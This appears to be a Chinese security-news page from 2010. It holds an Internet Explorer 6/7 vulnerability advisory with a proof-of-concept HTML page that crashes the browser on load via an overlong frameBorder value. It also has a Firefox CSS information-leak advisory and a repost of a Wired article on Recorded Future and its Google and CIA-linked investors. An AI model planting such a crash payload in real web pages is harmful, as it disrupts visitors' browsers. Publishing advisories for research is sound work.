体验盒子

发布时间：2010-07-27
影响版本：IE6/IE7
测试环境：Windows Xp Sp3

漏洞描述:

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

用户使用IE访问了恶意网页并向frame.frameBorder属性传送了超长整数值或字符串就可以导致浏览器崩溃。

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<head>
<script>
function dos(){
  var e = document.createElement('frame');
  var prop = 'frameBorder';
  e[prop] = 0123456789;
}
</script>
</head>
<body onload="dos()">
</body>
</html>

安全建议:

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

发布时间:2010-07-21
影响版本:

Mozilla Firefox 3.6.x
Mozilla Firefox 3.5.x
Mozilla Thunderbird 3.1.x
Mozilla Thunderbird 3.0.x
Mozilla SeaMonkey < 2.0.6

漏洞描述:

Firefox是一款流行的开源WEB浏览器。

如果攻击者能够向目标页的A和B两点之间注入CSS选择器的开放和关闭部分，用户就可以通过getComputedStyle() API读取两个注入点之间的部分。

<*参考
http://secunia.com/advisories/39925/
https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=524223
http://www.mozilla.org/security/announce/2010/mfsa2010-46.html
https://www.redhat.com/support/errata/RHSA-2010-0547.html
*>

安全建议:

厂商补丁：

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2010:0547-01）以及相应补丁:
RHSA-2010:0547-01：Critical: firefox security update
链接：https://www.redhat.com/support/errata/RHSA-2010-0547.html

有一家叫做Recorded Future的公司，号称在开发一种新技术，可以通过扫描并分析成千上万网站、博客、twitter帐户的信息来找到目前和未来人们、组织、活动和事件之间的关联性。在白皮书里，这家公司称他们的时序分析引擎可以找到文档和人们谈论的相同的、相关的事情之间的“潜在关联”，超越搜索。

该技术可以找出卷入到各个事件里的人，发生地点和它接下来会如何发展下去。换句话说Recorded Future可以给出任何事件的在线发展趋势。他们的CEO Christopher Ahlberg说：

这个东西牛逼之处在于，在很多情况下，你可以真的预测事件的发展曲线。

Recorded Future尽管还只是一个拥有16位剑桥博士的公司，但已经吸引来了Google旗下投资公司Google Ventures的投资，另外一位投资人则是美国中央情报局（CIA）旗下的In-Q-Tel投资公司。

Recorded Future的预测技术是不是纯扯淡呢？今年3月21日，以色列总统佩雷斯指控黎巴嫩真主党有飞毛腿导弹，Recorded Future搜索了黎巴嫩真主党领袖纳斯鲁拉以前的言论，发现一个月前就有确凿的证据证明佩雷斯的指控是没错的。

Recorded Future的博客举了几个情报分析的例子，他们应该已经引起了一家间谍机构的注意，In-Q-Tel之前可从未投资过未向最终用户进行产品测试的公司。

实际上Google Ventures和In-Q-Tel在2009年Recorded Future刚刚成立的时候就一起投了资，具体数额未被披露，不过应该不高于1000万美元，这也使得Google Ventures和In-Q-Tel已经加入了Recorded Future的董事会。Recorded Future CEO Christopher Ahlberg说他们都是很有帮助的董事，可以给出商业和技术方面的建议，还会介绍来新的潜在客户。

这并不是Google第一次跟美国间谍机构联手做事了，很久以前他们就在跟美国构架安全局（NSA）合作以抵挡黑客袭击，Google还曾经销售设备给秘密情报组织。Google在2004年还买下了美国中央情报局（CIA）投资过的In-Q-Tel公司背后的地图绘制公司Keyhole，之后才有的Google Earth。

不过这确实是Google第一次联合跟美国中央情报局在同一时间投资一家创业公司，当然他们跟美国中央情报局联合做事并不是什么犯法的事，但这一定 会招来很多批评，尤其是他们跟美国政府走的越来越近的关系，不得不让对美国政府天生就不信任的美国人民（当然很多中国人民就更不信任他们了）担心 Google是不是用“不作恶”的信条来擦屁股了。

Google并未对Wired的这篇文章做出回应，In-Q-Tel主管Lisbeth Poulos发邮件声明说，他们很高兴Recorded Future加入了IQT的投资组合，可以帮助美国情报部门完成使命。

我怎么觉得这篇文章有点像电影剧本？开始有一个可以预测未来的技术，然后美国政府秘密进入妄图用于歪门邪道，之后出现一个不死英雄只身一人挫败美国 政府的阴谋，最后将这个技术彻底烧毁拯救了地球。Google是想做这个拯救人类的不死英雄，还是美国政府的同谋呢？这是个问题……

继续观看一段Recorded Future的官方介绍视频：

原视频请看这

Via Wired